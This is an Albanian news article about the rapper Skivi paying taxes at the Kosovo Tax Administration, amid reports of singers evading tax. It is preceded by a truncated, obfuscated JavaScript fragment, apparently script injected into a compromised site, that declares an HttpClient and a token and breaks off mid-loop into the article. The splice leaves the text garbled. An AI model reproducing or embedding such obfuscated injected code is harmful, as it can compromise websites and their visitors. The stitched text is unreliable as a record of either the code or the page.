;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tatimi ‘thërret’: Reperi i njohur që në mëngjes drejt zyreve

By

Çështja e tatimit në fitim për këngëtarët shqiptarë të paktën tash e dy vite është mjaft e aktualizuar.

Mijëra euro të fituara nëpër koncerte e fare pak pagesa si detyrim ndaj shtetit kanë bërë që jo rrallë, lista me emra të yjeve të skenës të dalin në publik.

Me pompozitet, raportohej edhe për arrestime potenciale por përtej retorikës boshe, pak është bërë në këtë drejtim dhe gjërat rrjedhin gati si më parë.

Megjithatë, është një reper i cili po tregohet shumë korrekt në raport me detyrimet ligjore duke shmangur kështu problemet eventuale me ligjin.

Bëhet fjalë për Skivin, reperin nga Babastars i cili sot në orët e hershme të mëngjesit ka përmbushur obligimet në zyrat qendrore të Administratës Tatimore të Kosovës në shesh shkruan Prive.al.

Në rrjetin social Snapchat, ai madje ka treguar si dëshmi edhe e-mailin e dërguar nga ky institucion.

Ndryshe, të shumtë në numër kanë qenë këtë vit këngëtarët që publikisht nga frika, kanë refuzuar të tregojnë të saktë numrin e dasmave apo mbrëmjeve muzikore të zhvilluara gjatë verës. /Prive.al/

Artikuj të ngjashëm